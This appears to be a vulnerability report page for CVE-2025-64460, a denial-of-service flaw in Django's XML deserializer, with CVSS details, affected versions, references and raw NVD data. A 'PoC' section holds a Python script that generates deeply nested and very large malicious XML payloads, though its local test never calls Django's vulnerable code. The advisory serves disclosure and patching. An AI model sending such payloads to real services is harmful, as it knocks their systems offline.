Security Vulnerability Report
CVE-2025-64460 CVSS 7.5 HIGH

CVE-2025-64460

Published: 2025-12-02 16:15:56
Last Modified: 2025-12-10 21:47:14
Source: 6a34fbeb-21d4-45e7-8e0a-62b95bc12c92

Description

An issue was discovered in Django 5.2 before 5.2.9, 5.1 before 5.1.15, and 4.2 before 4.2.27. Algorithmic complexity in `django.core.serializers.xml_serializer.getInnerText()` allows a remote attacker to cause a potential denial of service (CPU and memory exhaustion) via specially crafted XML input processed by the XML `Deserializer`. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Seokchan Yoon for reporting this issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

Django 5.2 < 5.2.9 (cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*, 5.2 <= version < 5.2.9) - VULNERABLE
Django 5.1 < 5.1.15 (cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*, 5.1 <= version < 5.1.15) - VULNERABLE
Django 4.2 < 4.2.27 (cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*, 4.2 <= version < 4.2.27) - VULNERABLE
Django 5.0.x (possibly affected, not evaluated)
Django 4.1.x (possibly affected, not evaluated)
Django 3.2.x (possibly affected, not evaluated)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import xml.etree.ElementTree as ET

# Malicious XML payload designed to trigger algorithmic complexity
# in Django's XML deserializer getInnerText() function


def generate_malicious_xml():
    # Generate XML with deeply nested elements
    # This exploits the O(n^2) complexity in getInnerText()
    xml_content = '''<?xml version="1.0"?>
<data>
<item>
<content>''' + '<nested>' * 10000 + 'text' + '</nested>' * 10000 + '''</content>
</item>
</data>'''
    return xml_content


# Alternative: XML with many sibling elements
def generate_exponential_xml():
    items = ''.join(['<item>payload</item>' for _ in range(100000)])
    return f'''<?xml version="1.0"?>
<root>{items}</root>'''


# Example usage with Django's XML deserializer
# from django.core.serializers.xml_serializer import Deserializer
#
# malicious_xml = generate_malicious_xml()
# deserializer = Deserializer(malicious_xml)
# for obj in deserializer:
#     pass  # This will trigger DoS condition

if __name__ == '__main__':
    print('Generating malicious XML payload...')
    xml = generate_malicious_xml()
    print(f'Generated {len(xml)} bytes of malicious XML')

    # Test parsing locally
    import time
    start = time.time()
    try:
        root = ET.fromstring(xml)
        print(f'Parse completed in {time.time() - start:.2f}s')
    except Exception as e:
        print(f'Parse failed: {e}')
```

References

https://docs.djangoproject.com/en/dev/releases/security/ (Patch, Vendor Advisory)
https://groups.google.com/g/django-announce (Mailing List, Release Notes)
https://www.djangoproject.com/weblog/2025/dec/02/security-releases/ (Patch, Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64460", "sourceIdentifier": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "published": "2025-12-02T16:15:56.013", "lastModified": "2025-12-10T21:47:14.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in 5.2 before 5.2.9, 5.1 before 5.1.15, and 4.2 before 4.2.27.\nAlgorithmic complexity in `django.core.serializers.xml_serializer.getInnerText()` allows a remote attacker to cause a potential denial-of-service attack triggering CPU and memory exhaustion via specially crafted XML input processed by the XML `Deserializer`.\nEarlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\nDjango would like to thank Seokchan Yoon for reporting this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-407"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2", "versionEndExcluding": "4.2.27", "matchCriteriaId": "5208B938-135B-4682-9340-C15B7329ABA6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.1", "versionEndExcluding": "5.1.15", "matchCriteriaId": "37B0F07E-F8EA-4DFF-8ED9-C60A79A9ED24"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2", "versionEndExcluding": "5.2.9", "matchCriteriaId": "C523418D-ACB5-4E97-9D05-6879B0F48344"}]}]}], "references": [{"url": "https://docs.djangoproject.com/en/dev/releases/security/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://groups.google.com/g/django-announce", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Mailing List", "Release Notes"]}, {"url": "https://www.djangoproject.com/weblog/2025/dec/02/security-releases/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Patch", "Vendor Advisory"]}]}}